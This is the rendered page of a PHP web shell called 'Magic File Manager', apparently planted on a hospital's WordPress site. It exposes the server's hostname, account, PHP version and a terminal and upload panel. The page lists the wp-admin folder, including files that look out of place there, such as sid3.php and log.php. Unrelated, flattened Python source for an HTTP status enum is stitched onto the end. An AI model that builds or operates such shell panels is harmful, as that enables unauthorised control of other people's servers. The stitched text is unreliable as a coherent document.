โœจ Magic File Manager

๐Ÿš€ Hostinger Optimized
๐Ÿ–ฅ๏ธ Server: Apache
๐Ÿ’ป System: Linux bom1plzcpnl503817.prod.bom1.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
๐Ÿ‘ค User: pnj6a06usxf3 (9714991)
๐Ÿ˜ PHP: 8.1.34
๐Ÿšซ Disabled: โœจ NONE

๐Ÿ’ป Terminal

๐Ÿ“ /home/pnj6a06usxf3/public_html/shivshaktihospital.co.in/wp-admin
$

๐Ÿ“ Create New

โฌ†๏ธ Upload File

๐Ÿ“Š Max upload: 32M | ๐Ÿ“ฆ Max POST: 128M

๐Ÿ“„ Name๐Ÿ“Š Size๐Ÿ”’ Permโšก Actions
๐Ÿ“ css--drwxr-xr-x
๐Ÿ“ images--drwxr-xr-x
๐Ÿ“ includes--drwxr-xr-x
๐Ÿ“ js--drwxr-xr-x
๐Ÿ“ maint--drwxr-xr-x
๐Ÿ“ network--drwxr-xr-x
๐Ÿ“ user--drwxr-xr-x
๐Ÿ˜ about.php17.572 KB-rw-r--r--
๐Ÿ˜ admin-ajax.php5.025 KB-rw-r--r--
๐Ÿ˜ admin-footer.php2.738 KB-rw-r--r--
๐Ÿ˜ admin-functions.php0.461 KB-rw-r--r--
๐Ÿ˜ admin-header.php9.066 KB-rw-r--r--
๐Ÿ˜ admin-post.php1.974 KB-rw-r--r--
๐Ÿ˜ admin.php12.632 KB-rw-r--r--
๐Ÿ˜ async-upload.php5.473 KB-rw-r--r--
๐Ÿ˜ authorize-application.php10.093 KB-rw-r--r--
๐Ÿ˜ comment.php11.37 KB-rw-r--r--
๐Ÿ˜ contribute.php5.523 KB-rw-r--r--
๐Ÿ˜ credits.php4.044 KB-rw-r--r--
๐Ÿ˜ custom-background.php0.471 KB-rw-r--r--
๐Ÿ˜ custom-header.php0.48 KB-rw-r--r--
๐Ÿ˜ customize.php11.314 KB-rw-r--r--
๐Ÿ˜ edit-comments.php14.145 KB-rw-r--r--
๐Ÿ˜ edit-form-advanced.php28.79 KB-rw-r--r--
๐Ÿ˜ edit-form-blocks.php15.164 KB-rw-r--r--
๐Ÿ˜ edit-form-comment.php13.652 KB-rw-r--r--
๐Ÿ˜ edit-link-form.php6.198 KB-rw-r--r--
๐Ÿ˜ edit-tag-form.php10.408 KB-rw-r--r--
๐Ÿ˜ edit-tags.php21.982 KB-rw-r--r--
๐Ÿ˜ edit.php19.484 KB-rw-r--r--
๐Ÿ˜ erase-personal-data.php7.329 KB-rw-r--r--
๐Ÿ“„ error_log9.984 KB-rw-r--r--
๐Ÿ˜ export-personal-data.php7.754 KB-rw-r--r--
๐Ÿ˜ export.php11.001 KB-rw-r--r--
๐Ÿ˜ font-library.php1.445 KB-rw-r--r--
๐Ÿ˜ freedoms.php4.467 KB-rw-r--r--
๐Ÿ˜ import.php7.584 KB-rw-r--r--
๐Ÿ˜ index.php7.68 KB-rw-r--r--
๐Ÿ˜ install-helper.php6.798 KB-rw-r--r--
๐Ÿ˜ install.php17.944 KB-rw-r--r--
๐Ÿ˜ link-add.php0.912 KB-rw-r--r--
๐Ÿ˜ link-manager.php4.259 KB-rw-r--r--
๐Ÿ˜ link-parse-opml.php2.657 KB-rw-r--r--
๐Ÿ˜ link.php2.888 KB-rw-r--r--
๐Ÿ˜ load-scripts.php2.021 KB-rw-r--r--
๐Ÿ˜ load-styles.php2.925 KB-rw-r--r--
๐Ÿ˜ log.php63.893 KB-rw-r--r--
๐Ÿ˜ media-new.php3.173 KB-rw-r--r--
๐Ÿ˜ media-upload.php3.582 KB-rw-r--r--
๐Ÿ˜ media.php0.8 KB-rw-r--r--
๐Ÿ˜ menu-header.php9.816 KB-rw-r--r--
๐Ÿ˜ menu.php17.709 KB-rw-r--r--
๐Ÿ˜ moderation.php0.3 KB-rw-r--r--
๐Ÿ˜ ms-admin.php0.191 KB-rw-r--r--
๐Ÿ˜ ms-delete-site.php4.505 KB-rw-r--r--
๐Ÿ˜ ms-edit.php0.211 KB-rw-r--r--
๐Ÿ˜ ms-options.php0.224 KB-rw-r--r--
๐Ÿ˜ ms-sites.php0.21 KB-rw-r--r--
๐Ÿ˜ ms-themes.php0.212 KB-rw-r--r--
๐Ÿ˜ ms-upgrade-network.php0.214 KB-rw-r--r--
๐Ÿ˜ ms-users.php0.21 KB-rw-r--r--
๐Ÿ˜ my-sites.php4.718 KB-rw-r--r--
๐Ÿ˜ nav-menus.php49.022 KB-rw-r--r--
๐Ÿ˜ network.php5.394 KB-rw-r--r--
๐Ÿ˜ options-connectors.php1.507 KB-rw-r--r--
๐Ÿ˜ options-discussion.php16.019 KB-rw-r--r--
๐Ÿ˜ options-general.php22.319 KB-rw-r--r--
๐Ÿ˜ options-head.php0.6 KB-rw-r--r--
๐Ÿ˜ options-media.php6.484 KB-rw-r--r--
๐Ÿ˜ options-permalink.php21.964 KB-rw-r--r--
๐Ÿ˜ options-privacy.php10.453 KB-rw-r--r--
๐Ÿ˜ options-reading.php9.959 KB-rw-r--r--
๐Ÿ˜ options-writing.php9.184 KB-rw-r--r--
๐Ÿ˜ options.php13.932 KB-rw-r--r--
๐Ÿ˜ plugin-editor.php13.741 KB-rw-r--r--
๐Ÿ˜ plugin-install.php7.259 KB-rw-r--r--
๐Ÿ˜ plugins.php30.023 KB-rw-r--r--
๐Ÿ˜ post-new.php2.703 KB-rw-r--r--
๐Ÿ˜ post.php10.567 KB-rw-r--r--
๐Ÿ˜ press-this.php2.412 KB-rw-r--r--
๐Ÿ˜ privacy-policy-guide.php3.668 KB-rw-r--r--
๐Ÿ˜ privacy.php2.453 KB-rw-r--r--
๐Ÿ˜ profile.php0.276 KB-rw-r--r--
๐Ÿ˜ revision.php5.699 KB-rw-r--r--
๐Ÿ˜ setup-config.php17.508 KB-rw-r--r--
๐Ÿ˜ sid3.php55.304 KB-rw-r--r--
๐Ÿ˜ site-editor.php12.19 KB-rw-r--r--
๐Ÿ˜ site-health-info.php4.075 KB-rw-r--r--
๐Ÿ˜ site-health.php10.183 KB-rw-r--r--
๐Ÿ˜ term.php2.196 KB-rw-r--r--
๐Ÿ˜ theme-editor.php16.874 KB-rw-r--r--
๐Ÿ˜ theme-install.php23.745 KB-rw-r--r--
๐Ÿ˜ themes.php48.563 KB-rw-r--r--
๐Ÿ˜ tools.php3.432 KB-rw-r--r--
๐Ÿ˜ update-core.php45.119 KB-rw-r--r--
๐Ÿ˜ update.php12.756 KB-rw-r--r--
๐Ÿ˜ upgrade-functions.php0.333 KB-rw-r--r--
๐Ÿ˜ upgrade.php6.24 KB-rw-r--r--
๐Ÿ˜ upload.php14.934 KB-rw-r--r--
๐Ÿ˜ user-edit.php40.863 KB-rw-r--r--
๐Ÿ˜ user-new.php24.086 KB-rw-r--r--
๐Ÿ˜ users.php25.096 KB-rw-r--r--
๐Ÿ˜ widgets-form-blocks.php5.112 KB-rw-r--r--
๐Ÿ˜ widgets-form.php19.129 KB-rw-r--r--
๐Ÿ˜ widgets.php1.086 KB-rw-r--r--
from enum import IntEnum __all__ = ['HTTPStatus'] class HTTPStatus(IntEnum): """HTTP status codes and reason phrases Status codes from the following RFCs are all observed: * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616 * RFC 6585: Additional HTTP Status Codes * RFC 3229: Delta encoding in HTTP * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518 * RFC 5842: Binding Extensions to WebDAV * RFC 7238: Permanent Redirect * RFC 2295: Transparent Content Negotiation in HTTP * RFC 2774: An HTTP Extension Framework """ def __new__(cls, value, phrase, description=''): obj = int.__new__(cls, value) obj._value_ = value obj.phrase = phrase obj.description = description return obj # informational CONTINUE = 100, 'Continue', 'Request received, please continue' SWITCHING_PROTOCOLS = (101, 'Switching Protocols', 'Switching to new protocol; obey Upgrade header') PROCESSING = 102, 'Processing' # success OK = 200, 'OK', 'Request fulfilled, document follows' CREATED = 201, 'Created', 'Document created, URL follows' ACCEPTED = (202, 'Accepted', 'Request accepted, processing continues off-line') NON_AUTHORITATIVE_INFORMATION = (203, 'Non-Authoritative Information', 'Request fulfilled from cache') NO_CONTENT = 204, 'No Content', 'Request fulfilled, nothing follows' RESET_CONTENT = 205, 'Reset Content', 'Clear input form for further input' PARTIAL_CONTENT = 206, 'Partial Content', 'Partial content follows' MULTI_STATUS = 207, 'Multi-Status' ALREADY_REPORTED = 208, 'Already Reported' IM_USED = 226, 'IM Used' # redirection MULTIPLE_CHOICES = (300, 'Multiple Choices', 'Object has several resources -- see URI list') MOVED_PERMANENTLY = (301, 'Moved Permanently', 'Object moved permanently -- see URI list') FOUND = 302, 'Found', 'Object moved temporarily -- see URI list' SEE_OTHER = 303, 'See Other', 'Object moved -- see Method and URL list' NOT_MODIFIED = (304, 'Not Modified', 'Document has not changed since given time') USE_PROXY = (305, 'Use Proxy', 'You must use proxy specified in Location to access this resource') TEMPORARY_REDIRECT = (307, 'Temporary Redirect', 'Object moved temporarily -- see URI list') PERMANENT_REDIRECT = (308, 'Permanent Redirect', 'Object moved temporarily -- see URI list') # client error BAD_REQUEST = (400, 'Bad Request', 'Bad request syntax or unsupported method') UNAUTHORIZED = (401, 'Unauthorized', 'No permission -- see authorization schemes') PAYMENT_REQUIRED = (402, 'Payment Required', 'No payment -- see charging schemes') FORBIDDEN = (403, 'Forbidden', 'Request forbidden -- authorization will not help') NOT_FOUND = (404, 'Not Found', 'Nothing matches the given URI') METHOD_NOT_ALLOWED = (405, 'Method Not Allowed', 'Specified method is invalid for this resource') NOT_ACCEPTABLE = (406, 'Not Acceptable', 'URI not available in preferred format') PROXY_AUTHENTICATION_REQUIRED = (407, 'Proxy Authentication Required', 'You must authenticate with this proxy before proceeding') REQUEST_TIMEOUT = (408, 'Request Timeout', 'Request timed out; try again later') CONFLICT = 409, 'Conflict', 'Request conflict' GONE = (410, 'Gone', 'URI no longer exists and has been permanently removed') LENGTH_REQUIRED = (411, 'Length Required', 'Client must specify Content-Length') PRECONDITION_FAILED = (412, 'Precondition Failed', 'Precondition in headers is false') REQUEST_ENTITY_TOO_LARGE = (413, 'Request Entity Too Large', 'Entity is too large') REQUEST_URI_TOO_LONG = (414, 'Request-URI Too Long', 'URI is too long') UNSUPPORTED_MEDIA_TYPE = (415, 'Unsupported Media Type', 'Entity body in unsupported format') REQUESTED_RANGE_NOT_SATISFIABLE = (416, 'Requested Range Not Satisfiable', 'Cannot satisfy request range') EXPECTATION_FAILED = (417, 'Expectation Failed', 'Expect condition could not be satisfied') UNPROCESSABLE_ENTITY = 422, 'Unprocessable Entity' LOCKED = 423, 'Locked' FAILED_DEPENDENCY = 424, 'Failed Dependency' UPGRADE_REQUIRED = 426, 'Upgrade Required' PRECONDITION_REQUIRED = (428, 'Precondition Required', 'The origin server requires the request to be conditional') TOO_MANY_REQUESTS = (429, 'Too Many Requests', 'The user has sent too many requests in ' 'a given amount of time ("rate limiting")') REQUEST_HEADER_FIELDS_TOO_LARGE = (431, 'Request Header Fields Too Large', 'The server is unwilling to process the request because its header ' 'fields are too large') # server errors INTERNAL_SERVER_ERROR = (500, 'Internal Server Error', 'Server got itself in trouble') NOT_IMPLEMENTED = (501, 'Not Implemented', 'Server does not support this operation') BAD_GATEWAY = (502, 'Bad Gateway', 'Invalid responses from another server/proxy') SERVICE_UNAVAILABLE = (503, 'Service Unavailable', 'The server cannot process the request due to a high load') GATEWAY_TIMEOUT = (504, 'Gateway Timeout', 'The gateway server did not receive a timely response') HTTP_VERSION_NOT_SUPPORTED = (505, 'HTTP Version Not Supported', 'Cannot fulfill request') VARIANT_ALSO_NEGOTIATES = 506, 'Variant Also Negotiates' INSUFFICIENT_STORAGE = 507, 'Insufficient Storage' LOOP_DETECTED = 508, 'Loop Detected' NOT_EXTENDED = 510, 'Not Extended' NETWORK_AUTHENTICATION_REQUIRED = (511, 'Network Authentication Required', 'The client needs to authenticate to gain network access')